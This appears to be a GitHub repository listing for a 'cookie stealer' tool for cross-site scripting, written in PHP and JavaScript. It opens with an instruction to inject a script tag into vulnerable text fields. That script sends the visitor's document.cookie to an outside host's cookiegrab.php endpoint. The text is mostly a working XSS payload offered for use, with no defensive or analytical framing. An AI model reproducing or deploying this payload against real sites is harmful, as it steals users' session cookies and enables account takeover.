inject <script language="javascript"> document.location= " http://kennethzhang.net/cookiegrab.php?c=" + document.cookie; </script> into vulnerable text fields
laurencejbelliott/cookie-stealer
Simple PHP - Javascript - Webserver Cookie Stealer Script for XSS
PHP